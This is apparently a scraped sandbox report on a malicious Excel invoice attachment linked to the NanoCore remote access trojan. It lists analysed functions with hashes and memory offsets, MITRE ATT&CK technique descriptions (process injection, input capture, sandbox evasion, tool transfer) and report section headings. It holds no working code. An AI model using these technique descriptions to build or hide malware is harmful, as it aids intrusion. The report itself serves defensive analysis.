Instruction Fuzzy Hash: 2A51F531F081549FCB06DB789848BAEBBF6EBC531472684BFC016DB651DA319D068B51

Uniqueness

Uniqueness Score: -1.00%

Function 003CA590, Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

hS[, xrefs: 003CA5D3
_qq, xrefs: 003CA59D
Y[, xrefs: 003CA5E7
&/, xrefs: 003CA669

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: _qq$ Y[$&/$hS[
API String ID: 0-1891085562
Opcode ID: 5c665f4e3892c3aa7759933bd57453e8271aa8528456d78ee440c296e816ba41
Instruction ID: 26ace54c483b05095f9ecf83f297cb57682d92c207a9440177cefc4cf199168e
Opcode Fuzzy Hash: 5c665f4e3892c3aa7759933bd57453e8271aa8528456d78ee440c296e816ba41
Instruction Fuzzy Hash: 8641C330704A098FD7199B20C494B2DBBA6BB86308F65C96EC147CBB85DB74EC55C792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: smtpsvc.exe PID: 1296 Parent PID: 1388 smtpsvc.exeCOMMON

Executed Functions

Function 003407E8, Relevance: 4.1, Strings: 3, Instructions: 371COMMON

Download Yara Rule

Strings

\,,, xrefs: 00340D20
\,,, xrefs: 00340C8C
\,,, xrefs: 00340CE8

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: \,,$\,,$\,,
API String ID: 0-2223926321
Opcode ID: 96bff282b9f9cce820ef7dde59bf8ddbdfa5c625c05dd7daa877e1b291c95562
Instruction ID: 4c39d9a8712213dc9a7a02e3f3ba06b0099c6f366af733c2cd20427278f9cc38
Opcode Fuzzy Hash: 96bff282b9f9cce820ef7dde59bf8ddbdfa5c625c05dd7daa877e1b291c95562
Instruction Fuzzy Hash: 1FF15A30300601CFDB19EF60E894A2A77E6FBE4314B25C919C64A9F259DBB0FD42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 003400E8, Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

\,,, xrefs: 00340221
:@lq, xrefs: 0034029B

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: :@lq$\,,
API String ID: 0-3485403915
Opcode ID: d9f543bfff7bd34b0bbb30cfe53c7b68c795cecf5b2a9d69dad9a2070ff102ee
Instruction ID: e241b86d251349c0ef4fbc3ff2f332dcb4b56ac91dae3b72d456de700f96fd4f
Opcode Fuzzy Hash: d9f543bfff7bd34b0bbb30cfe53c7b68c795cecf5b2a9d69dad9a2070ff102ee
Instruction Fuzzy Hash: A9717F34B00201CFD719EB78E858B6A77E3BB98340F598468D906AF7A5DBB59C44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00340DA0, Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

\,,, xrefs: 00340DE7
\,,, xrefs: 00340DD5

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: \,,$\,,
API String ID: 0-1280946949
Opcode ID: 16be097ba35862b0e7811d54d0ed4ace0de0333cc0359fe947dc8560a3147b78
Instruction ID: 8476815b5b440333af1f0823aff182ebaa736082da2356713947e6f4f8fdbfab
Opcode Fuzzy Hash: 16be097ba35862b0e7811d54d0ed4ace0de0333cc0359fe947dc8560a3147b78
Instruction Fuzzy Hash: F611E430B103489FCB14A775D81069E7BAAAF96711F1484AAD504EF291CF749D068BA2

Uniqueness

Uniqueness Score: -1.00%

Function 002BA4AA, Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,61E209F1,00000000,00000000,00000000,00000000), ref: 002BA53D

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 662892317a62f4fa6988765980f671f47e6502526d2848b7b4ab59823b504b9b
Instruction ID: e480f0424354fa6f19d4bf3ed9178a037f588d6baf6e17af2d581565ce132192
Opcode Fuzzy Hash: 662892317a62f4fa6988765980f671f47e6502526d2848b7b4ab59823b504b9b
Instruction Fuzzy Hash: 9E21A671409380AFE7228F519C55F96BFB8EF06310F0885DBE9849B193C265A909C772

Uniqueness

Uniqueness Score: -1.00%

Function 002BA1F4, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 002BA269

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 7a88abb8150e76d2432fa5e43758081388cdd47abb29a2f0289fd6d5ba2d9086
Instruction ID: 614cacc90c9236078429635dd862e98e2e27133e3fcb795b2887aa6e7daa8854
Opcode Fuzzy Hash: 7a88abb8150e76d2432fa5e43758081388cdd47abb29a2f0289fd6d5ba2d9086
Instruction Fuzzy Hash: C7216D7140D3C09FD7138B298895692BFB0AF03220F0A81DBDD848F1A3D269A919CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002BA4DE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,61E209F1,00000000,00000000,00000000,00000000), ref: 002BA53D

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 32cb4e53d74f8eb519653663c0b5ed4ccb7f6d625322b30f8084b44177010afa
Instruction ID: 62e42a87603f5e15f2c18c2660d94172e8f1cd1dfacb06ac6be282759b8cba9e
Opcode Fuzzy Hash: 32cb4e53d74f8eb519653663c0b5ed4ccb7f6d625322b30f8084b44177010afa
Instruction Fuzzy Hash: 1611E372900300EFEB31CF51DC85FAAFBE8EF44760F14856AF9499A141C675AA14CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 002BA2A3, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 002BA2FC

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: c23d282e1488ab12876983ce0f230e912ad5b7ca73ee32a8a08926f7ce07b7a1
Instruction ID: 49e6aa477a8da23e60ff4e23c90ed4fdba773fc81d955fbaa524797d2e3f0c86
Opcode Fuzzy Hash: c23d282e1488ab12876983ce0f230e912ad5b7ca73ee32a8a08926f7ce07b7a1
Instruction Fuzzy Hash: 9211A0715093C09FDB128B25DC85A92BFF4EF06320F0984DBED858B263C265A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002BA2CA, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 002BA2FC

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 0424cb3abc69f0e49ca08206f67dc0b856ee7dd7cd853beb02f79771d06b3781
Instruction ID: d60c730ba9e865c4a291e540301f9e0087f109cbfa65d2676ffd4784e4343046
Opcode Fuzzy Hash: 0424cb3abc69f0e49ca08206f67dc0b856ee7dd7cd853beb02f79771d06b3781
Instruction Fuzzy Hash: 0201F435614740CFEB208F15D8857A5FBD0EF01361F08C0EADD498B752D6B5E858DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 002BA23A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 002BA269

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 7a6060f7df9bdad3ea8a3c32937af4f051e666571859f566000a9137456b058a
Instruction ID: bfef9506f7c4504b6aa42273c9b80b5526a49e84f30d60fabf31859d7923d7ba
Opcode Fuzzy Hash: 7a6060f7df9bdad3ea8a3c32937af4f051e666571859f566000a9137456b058a
Instruction Fuzzy Hash: 26F0F031914740CFEB10CF0AD8897A1FBA0EF41761F18C0AADD094F342D2BAE954CAA3

Uniqueness

Uniqueness Score: -1.00%

Function 002BA336, Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 002BA39C

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b199ff72170b0b586cfa84741d070dc6304e515016af6f1fe8cf5d0326a2b812
Instruction ID: ffc03193d592d88973bd53758c65f1b14241601d0d2a55cf2e074e1f7ed8174e
Opcode Fuzzy Hash: b199ff72170b0b586cfa84741d070dc6304e515016af6f1fe8cf5d0326a2b812
Instruction Fuzzy Hash: 5D216D755093C09FD7128F25DC55A92BFB4EF02220F0984EBED85CF163C279A848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002BA36A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 002BA39C

Memory Dump Source

Source File: 00000008.00000002.2224793875.00000000002BA000.00000040.00000001.sdmp, Offset: 002BA000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 71cb0a22460b8769e459c0ad7c76c092c28883b4d1a48a4d0060ca81b003206d
Instruction ID: 8343445c2520f90843c534f4bb67081d7f44fb60cb1e57d08b66700728ba39eb
Opcode Fuzzy Hash: 71cb0a22460b8769e459c0ad7c76c092c28883b4d1a48a4d0060ca81b003206d
Instruction Fuzzy Hash: 5D01F275614340CFEB20CF15DC857A5FBD4EF00360F08C0EAED098B242D6B5E814DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 003406B9, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0585f32a2e25dd5fe0909fa8989ae741ba04a0fd6ae0cdc1b9b0ccd5e82c207
Instruction ID: bc1b2e0572b634c7a6c67e896e738737a158d0ed03513280860ef77b1d754965
Opcode Fuzzy Hash: f0585f32a2e25dd5fe0909fa8989ae741ba04a0fd6ae0cdc1b9b0ccd5e82c207
Instruction Fuzzy Hash: 81312B30705212CFCB19A778942876D37E7EF96315B1588B8D40ACF7A2DE35EC468792

Uniqueness

Uniqueness Score: -1.00%

Function 003406C8, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd91c9394cae5afe06263ae43feb97f0b9436da40d422db221a2739b1dec7708
Instruction ID: 59ccf3e2d074dd701be9e82a5150e137c281b7538a784235b51a36b21f9f38cc
Opcode Fuzzy Hash: cd91c9394cae5afe06263ae43feb97f0b9436da40d422db221a2739b1dec7708
Instruction Fuzzy Hash: 3521F930705212CFCB59AB7CD42872D36E7AF86715B1588B8D40ACF7A1DE35DC468B92

Uniqueness

Uniqueness Score: -1.00%

Function 01E807F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2225211045.0000000001E80000.00000040.00000040.sdmp, Offset: 01E80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944a7e55c11eec63a26789751ff5e209908accdd647627c0617d14267757277d
Instruction ID: 98697e3daca92c679a04d9af99eecd3886b1baece1b2f97a0cf5e7e73eca415d
Opcode Fuzzy Hash: 944a7e55c11eec63a26789751ff5e209908accdd647627c0617d14267757277d
Instruction Fuzzy Hash: 3201FE7250D3805FD7118F069C40823FFB8DF86560708C09FFC498B612D126A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00340EC8, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a0ffaf62b4ca1da2dd2663b30f109a82c46e7c36c13c549cc54942a6ceef07
Instruction ID: 08f5203dd17f6c077460c5e1aa9933b3a0bc0d5511503d683ae2a1d94c32c6ba
Opcode Fuzzy Hash: 72a0ffaf62b4ca1da2dd2663b30f109a82c46e7c36c13c549cc54942a6ceef07
Instruction Fuzzy Hash: 43F0A7307002108FC760EB7CD849A9537E6DF5532475044AAE805EB365D974AC09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01E8081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2225211045.0000000001E80000.00000040.00000040.sdmp, Offset: 01E80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e042d2a8241f512908dbc59f51ff58fed0a03b37c9993ae6906efb555aece79
Instruction ID: 1c929411c45bb07099a61ce0d9092cc2b2e9a340238c5ff6642c76b0d5caad50
Opcode Fuzzy Hash: 7e042d2a8241f512908dbc59f51ff58fed0a03b37c9993ae6906efb555aece79
Instruction Fuzzy Hash: D3E06D766047008BDA50CF0AEC81452F794EB84A30B18C07BDC0D8B700D576B5048AA1

Uniqueness

Uniqueness Score: -1.00%

Function 003400A8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe7ad7f849e6a9969cb7a81d41a0a922e63777964e721dcd5f24ebc14c4f32a
Instruction ID: 4981b046848a586fb0f7998255bf5a21067fb8413cb6bb7ba960f87b5746f707
Opcode Fuzzy Hash: 9fe7ad7f849e6a9969cb7a81d41a0a922e63777964e721dcd5f24ebc14c4f32a
Instruction Fuzzy Hash: 9CE09A71E0121D9F8F40DFB999455DFFFF8EA48250F204466D619F3200E23156118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00340ED8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961197d11c4289f89760591c105840cfcc059f737d2412ec3f9ddb6d79f493f7
Instruction ID: e34ad370a3424728858494a22bb64ca083fa5528fa4978413125cc3544319076
Opcode Fuzzy Hash: 961197d11c4289f89760591c105840cfcc059f737d2412ec3f9ddb6d79f493f7
Instruction Fuzzy Hash: 63E012307001108FC7A4FB6CD444A5A33DBEB492647504566E509FB364DA70AC04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0034039B, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224919992.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40e9d4e912d23e4de26bc4f4a007d35bf120f74455494da2b4c9aef064b0af8
Instruction ID: 2fc16b643055f2b0b044ba901b4b9be69f3ea95bd63324303d7a3f5df4b2ca76
Opcode Fuzzy Hash: c40e9d4e912d23e4de26bc4f4a007d35bf120f74455494da2b4c9aef064b0af8
Instruction Fuzzy Hash: CCF03974A00209CFDB19EFB4E12CBAD7AF1EF88304F250859C102AB2A0CB795D44CF95

Uniqueness

Uniqueness Score: -1.00%

Function 002B23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224788638.00000000002B2000.00000040.00000001.sdmp, Offset: 002B2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc344d7fe25ca598b9a1a710691042b4d1afc2604d023f56324fa560ca574799
Instruction ID: 87d7d2e36dbb4ebaada901a1eb6e507619d5d270285b6358eee1516582d3f8b7
Opcode Fuzzy Hash: fc344d7fe25ca598b9a1a710691042b4d1afc2604d023f56324fa560ca574799
Instruction Fuzzy Hash: C8D05E79214B928FD7168E1CC1A4BD53BE4AF51B05F4644F9A800CBAA3C768E9D5D200

Uniqueness

Uniqueness Score: -1.00%

Function 002B23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2224788638.00000000002B2000.00000040.00000001.sdmp, Offset: 002B2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5e7ea29f3ad214970cf493aedad211b11d0f95d862ce28c5b881b61baab9c8
Instruction ID: abfc7d1a16677f111aecdc70d51a693d2d57408f21f85bfef543b13377ccccd3
Opcode Fuzzy Hash: ed5e7ea29f3ad214970cf493aedad211b11d0f95d862ce28c5b881b61baab9c8
Instruction Fuzzy Hash: C8D05E343106828BDB15DE0CC294F9973E4AB40740F0644E8BC008B266C3B8ECD4C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

